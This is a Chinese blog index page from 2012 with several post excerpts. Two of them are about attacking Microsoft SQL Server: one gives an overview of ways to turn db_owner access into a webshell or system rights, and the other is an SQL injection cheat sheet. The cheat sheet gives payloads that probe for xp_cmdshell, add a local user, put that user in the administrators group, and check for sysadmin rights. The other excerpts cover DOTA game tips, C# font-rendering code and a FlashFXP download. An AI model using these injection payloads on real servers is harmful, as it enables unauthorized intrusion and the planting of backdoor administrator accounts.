作者:admin 发布于:2012-9-13 17:15 Thursday 分类:网络转载
13Sep
在看之前我们先回顾一下目前在公开或者已知的public和 db_owner权限拿到webshell或者系统权限的思路和方法(sysadmin权限我就不说拉,给你这么一句,只要是sysadmin,拿不到 webshell或者系统权限那是你的无能)public下面我还没见到一种可以真正能利用的方法。db_owner目前公开的方法主要有5种:第一种就 是最普遍的backup,现在利用差异备份生成的asp文件确实要比以前小拉不少,但能否得到webshell,目前成功率还不是很高。第二种就是在下的 万能提权,此法成功率几乎为零,只有在特定的条件下面才能实现。第三种就是LCX大虾在《MSSQL db_owner角色注入直接获得系统权限》,所说的利用xp_regread读出VNC在注册表的加密...作者:admin 发布于:2012-9-13 12:31 Thursday 分类:网络转载
13Sep
①、是否存在xp_cmdshell
and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')
②、用xp_cmdshell执行命令
;exec master..xp_cmdshell "net user name password /add"--
;exec master..xp_cmdshell "net localgroup name administrators /add"--
③、查看权限
and (select IS_SRVROLEMEMBER('sysadmin'))=1-- //sa
and (select ...
标签: mssql
作者:admin 发布于:2012-9-11 16:04 Tuesday
11Sep
DOTA6.74C AI和DOTA6.74C版本是一样的,所有的参数都是一样的 AI地图和是用来单机玩的,普通地图区是平台地图用来和其他玩家玩的 其实AI地图也是可以在平台联机玩的,只不过没什么人这么做! AI图还有就是你可以指挥友方和敌方,友方AI可以按space+enter+space就可以出来一个命令窗口, 里面基本上所有的命令都有,推塔,防守,进攻,打roshan什么的! 敌方Ai就只能通过手动打命令控制AI进攻、防守什么的!
标签: Dota
作者:admin 发布于:2012-9-10 13:11 Monday 分类:.NET
10Sep
List<byte[]> listMsg = new List<byte[]>();
for (int index = 0; index < message.Length; index++)
{
FileStream fsAsc16 = new FileStream("ASC16", FileMode.Open); //将"ASC16"字库文件读入文件流
FileStream fsHzk16 = new FileStream("HZK16", FileMode.Open); //将"HZK16"字库文件读入文件流
string s = message.Substring(index, 1);
...
标签: 点阵
作者:admin 发布于:2012-9-8 23:45 Saturday 分类:极品软件
08Sep
FlashFXP 是一个功能强大而实用 FXP/FTP 软件,融合其他优秀FTP软件的优点,如像 BpFTP能够缓存文件夹 ,支持多文件夹选择文件;像 CuteFTP 一样支持彩色文字显示,可以比较文件夹;像 LeapFTP 一样的外观界面,甚至设计思路也差相仿佛。支持文件夹(带子文件夹)的文件传送、删除;支持上传、下载及第三方文件续传;可以只传送需要的文件,跳过指定 的文件类型;不同文件类型可以自动以不同的显示颜色;可以缓存远端文件夹列表,支持FTP代理及 Socks 3&4;具有避免空闲功能,防止被站点踢出;可以显示或隐藏“隐藏”属性的文件、文件夹;支持每个站点使用被动模式等等。
flashfxp 4.x.x 中文绿色版
===========...
附件下载:
FlashFXP4.1.0.rar 2.29MB
标签: FlashFXP